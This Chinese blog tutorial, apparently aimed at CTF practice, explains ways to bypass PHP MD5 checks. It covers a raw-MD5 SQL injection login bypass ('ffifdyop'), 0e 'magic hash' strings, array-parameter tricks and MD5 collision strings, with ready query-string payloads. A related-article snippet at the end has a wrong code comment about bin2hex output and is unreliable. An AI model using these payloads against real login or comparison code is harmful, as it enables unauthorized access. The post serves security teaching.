PHP中MD5常见绕过

最新推荐文章于 2024-06-02 23:36:37 发布
最新推荐文章于 2024-06-02 23:36:37 发布
阅读量1w 收藏 45
点赞数 13
分类专栏: Web安全 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iczfy585/article/details/106081299
版权

PHP中md5的绕过

函数:

md5($string,bool): 得到一个字符串散列值。

其中第二个参数默认为false,表示该函数返回值是32个字符的十六进制数。

若指定为true,则表示函数返回的是16字节的二进制格式(这样通过浏览器解析会出现乱码)。

md5($password,true)的SQL注入问题

这里需要注意一下MYSQL中的一些数值比较的特征。

1.当数字和字符串比较时,若字符串的数字部分(需要从头开始)和数字是相同的,那么则返回的是true。

select if(1="1a","相等","不相等") as test

if(exp1,stat1,stat2):类似于高级语言中三元运算符。当exp1为true的是否返回stat1,为false返回stat2
在这里插入图片描述

2.以数字开头的字符串,若开头的字符不是0,那么在做逻辑运算的时候返回的是1,也就是true。

比如以下语句就是一个万能密码的例子:

select * from user where password =''or'1234a';

解释一下:'1234a’会被当做true对待。而任何数和true做逻辑或运算返回的值都是true.
在这里插入图片描述

看这个md5($password,true)的漏洞

select * from usera where username = 'admin' and password = md5($pass,true)

若我们可找到字符串,在对该字符串进行md5后能够得到 'or’加上一个非0的字符就可以绕过。这里我们可以用到的字符串为:ffifdyop。它的md5结果是:276f722736c95d99e921722cf9ed621c 。通过这个结果我们可以发现得到16字节的二进制被解析为字符的结果是:'or’6后面接乱码 (27是单引号的16进制编码,67是字母o的16进制…)这样后构造的sql语句就位

select * from user where password=' 'or'6xxx'

和上面分析的万能密码是一致的。

两变量值不相等,md5计算散列值后相等的绕过

  • ==的绕过

PHP中==是判断值是否相等,若两个变量的类型不相等,则会转化为相同类型后再进行比较。PHP在处理哈希字符串的时候,它把每一个以0e开头并且后面字符均为纯数字的哈希值都解析为0。常见的如下:

在md5加密后以0E开头

  • QNKCDZO
  • 240610708
  • s878926199a
  • s155964671a

以下串在sha1加密后以0E开头,并且后面均为纯数字

  • aaroZmOk
  • aaK1STfY

payload: /?a=QNKCDZO&b=240610708

<?php
    if($_GET['a'] !== $_GET['b']){
        if(md5($_GET['a']) == md5($_GET['b'])){
            echo "flag";
        }
    }
?>
  • ===的绕过

===会比较类型,这个时候可以用到PHP中md5()函数无法处理数组(会返回NULL)来实现绕过。

payload: /?a[]=1&b[]=2 (上面==的例子也可以用数组绕过)

<?php
    if($_GET['a'] !== $_GET['b']){
        if(md5($_GET['a']) === md5($_GET['b'])){
            echo "flag";
        }
    }
?>

MD5碰撞

 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }

这里和上面不同之处在于有一个强制类型转化,若传入数组转化后的结果都是字符串Array。这里需要用到的是MD5碰撞,也就是不同字符串但是MD5后值相同的情况。下面的任意两组字符串内容不同,但md5结果相同

$s1 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab"
$s2 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%5f%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%f3%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%e9%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%13%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%a8%1b%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%39%05%39%95%ab"
$s3 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%16%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%33%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab"
iringzh
关注
  • 13
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
PHP黑魔法之md5绕过
Thewei666的博客
05-14 424
示例:240610708和ONKCDZ0的md5值相似,但并不相同,在"=="相等操作符的运算下,结果会返回true(sha1和Md5一样)在两种情况下,会导致变量原值不同但 md5 或 sha1 相同。
md5bypass.7z
07-14
标题的"md5bypass.7z"表明这是一个与MD5绕过技术相关的学习资源,通常在网络安全领域,特别是CTF(Capture The Flag)比赛MD5绕过是一种常见的挑战。CTF比赛是通过解决各种安全问题来获取信息或控制权的竞赛,...
CTF_Webphp弱类型绕过md5碰撞
AFCC_的博客(Web_Dog)
08-09 4426
0x00 前言 md5碰撞只是一种掌握php弱类型的方式,弱类型的内容有很多,数组、字符串比较等等,但不论以哪种方式考,涉及的知识点都是相通的,希望通过对基础知识的分享与大家一同学习进步。 0x01 什么是md5MD5,即消息摘要算法(英语:MD5 Message-Digest Algorithm)。是一种被广泛使用的密码散列函数,将数据(如一段文字)运算变为另一固定长度值,是散列算法的基础原理,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。 显然12
Web 攻防:PHP特性漏洞 - MD5值比较绕过
最新发布
weixin_43320796的博客
06-02 617
md5() 函数计算字符串的 MD5 散列。MD5() 遇到公式,会运算公式,在对公式的值计算 md5 的值。由于 0 和任何数相乘都等于0,所以 0e 开头的任何数MD5都是相同的。科学计数法,大小等价,0e 和 0E 结果相同。格式为:aEb = a × 10^b,即 a 乘以 10 的 b 次幂。
MD5绕过
m0_64236521的博客
02-03 748
md5绕过
php MD5值比较绕过
海纳百川
05-31 5037
php MD5值比较绕过 关于 md5() 函数 在 php 程序md5($string,bool): 得到一个字符串散列值。其第二个参数默认为false,表示该函数返回值是32个字符的十六进制数。若指定为true,则表示函数返回的是16字节的二进制格式(这样通过浏览器解析会出现乱码)。 == 绕过 示例: if($_POST['a'] != $_POST['b']&& md5($_POST['a']) == md5($_POST['b'])) { echo $flag; }
PHP绕过MD5比较的各种姿势
b1ackc4t的博客
08-27 2508
1.用==进行弱类型比较时, 可以通过两个0e开头后面纯数字的md5绕过 php在进行弱类型比较时,如果为字符串为纯数字,包括浮点数、科学计数法、十六进制数等,都会转化为数字类型再进行比较,利用这点,0e开头的科学计数法大小均为0,所有均相等,即可绕过 以下实例的md5均满足0e开头纯数字 byGcY sonZ7y 240610708 s878926199a s155964671a s214587387a s214587387a s878926199a QNKCDZO aabg7XS
php mysql 绕过_PHPmd5绕过
weixin_31221157的博客
02-28 297
一、md5($password,true)的SQL注入问题这里要提到一下MySQL的数值比较问题。1、当数字和字符串比较时,若字符串的数字部分(需要从头开始)和数字是相同的,那么则返回的是true。select if(1="1abcd","等于","不等于") as test;if(exp1,stat1,stat2)类似于高级语言三元运算符。当exp1为true的是否返回stat1,为fals...
PHP短网址还原程序 1.0
05-02
6. **安全性考虑**:短网址服务可能存在安全风险,如被恶意利用来发起DDoS攻击或绕过网站的过滤机制。因此,程序需要考虑如何限制无效请求,防止滥用,并确保短网址的生成不包含敏感信息。 7. **URL路由与重定向**...
PHP 防恶意刷新实现代码
12-18
例如,如果用户清空了浏览器缓存或使用不同的设备,会话信息会被清除,恶意用户仍有可能绕过此限制。为了增强安全性,可以结合其他技术,如验证码、IP黑名单、限制同一IP的请求频率等。 最后,提供的链接提到的其他...
基于PHP的KnProxy PHP轻量级的基于Web代理.zip
07-20
这个项目旨在提供一个轻量级、易于部署的解决方案,帮助用户在Web环境进行匿名浏览或者绕过某些网络限制。通过使用PHP,开发者能够快速地将这个代理服务集成到现有的PHP Web服务器环境。 【描述】"基于PHP的...
php 破解防盗链图片函数
10-30
需要注意的是,这种方法虽然可以绕过某些简单的防盗链机制,但并不适用于所有情况。对于一些高级的防盗链策略,例如基于HTTP头的验证或者IP限制,这种简单的反防盗链函数可能无效。此外,频繁地从远程服务器抓取图片...
PHP绕过md5
jpygx123的博客
11-20 1188
测试代码: if (isset($_GET['Username']) &amp;&amp; isset($_GET['password'])) { $logined = true; $Username = $_GET['Username']; $password = $_GET['password']; if (!ctype_alpha($Usernam...
php md5弱比较绕过
qq_53086690的博客
06-16 421
md5($password,true)绕过 可以进行输入ffifdyop进行绕过 ffifdyop进行md5然后再转16进制就会变成’or 6xxxx就会变成永真式。 phpmd5进行==比较可以进行绕过 # ==绕过 1.可以进行数组绕过例如 md5($a) == md5($b) # a[]=1&b[]=2 2.可以进行科学计数法进行绕过 # ===绕过 1.只能是数组绕过 ...
PHPphp绕过MD5
李小白的博客
06-28 3378
if ($user['password'] == md5($password)) { $logined = true; } 在做用户登录的时候常常会用到md5加密计算比较密码,md5后相等,就可以成功执行下一步语句,登录成功。但是这样做并不安全,因为 0e在比较的时候会将其视作为科学计数法,所以无论0e后面是什么,0的多少次方还是0。介绍一批md5开头是0e的字符串QNKCDZO 0e83...
CTF:PHP MD5绕过和序列化漏洞
06-25 1417
CTF:PHP MD5绕过和序列化漏洞 作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.25 9:51 题目复现Docker环境: https://github.com/glzjin/buusec_2019_code_review_1 生命因为有限所以宝贵;因为有限,所以才要不懈努力。 ——名侦探柯南 源码 第一关:MD5绕过漏洞 CTF就是一个“套娃”游戏。首先我们把注意力集到if(md5($_POST[‘md51’]) == ...
PHP 绕过md5()函数比较
情感博主V
10-31 824
存在如下方法: 1、PHP在处理哈希字符串,存在一个缺陷, 它会把以“0e”开头的哈希值解释为“0”,因此,若存在两个数经过哈希后均以“0e”开头,则PHP会判断比较结果为True; 下面给出经过md5()函数哈希后以“0e”开头的字符串: String md5 s1885207154a 0e509367213418206700842008763514 s1836677006a...
PHPMD5加密的简单绕过及基于MD5加密的SQL注入
Landasika的博客
12-10 5288
部分内容参考于: sql注入:md5($password,true)_March97的博客-CSDN博客_md5($pass,true) 目录 一、简介 二、基于PHP漏洞的绕过 1、MD5弱比较“==”绕过 2、MD5强比较“===”绕过 三、有关SQL注入的MD5绕过 1、起因 2、注入原理 一、简介 md5() 函数计算字符串的 MD5 散列。 MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来..
php md5 hex
06-08
PHP 的 `md5()` 函数可以用来计算指定字符串的 MD5 散列值。而 `bin2hex()` 函数可以将二进制字符串转换为十六进制字符串。因此,要将一个字符串转换为其 MD5 散列值的十六进制表示,可以使用以下代码: ```php $str = 'hello world'; $md5 = md5($str); $hex = bin2hex($md5); echo $hex; // 输出:5eb63bbbe01eeed093cb22bb8f5acdc3 ``` 以上代码,首先定义了一个字符串 `$str`,然后使用 `md5()` 函数计算出了它的 MD5 散列值 `$md5`,最后使用 `bin2hex()` 函数将 `$md5` 转换为了十六进制字符串 `$hex` 并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值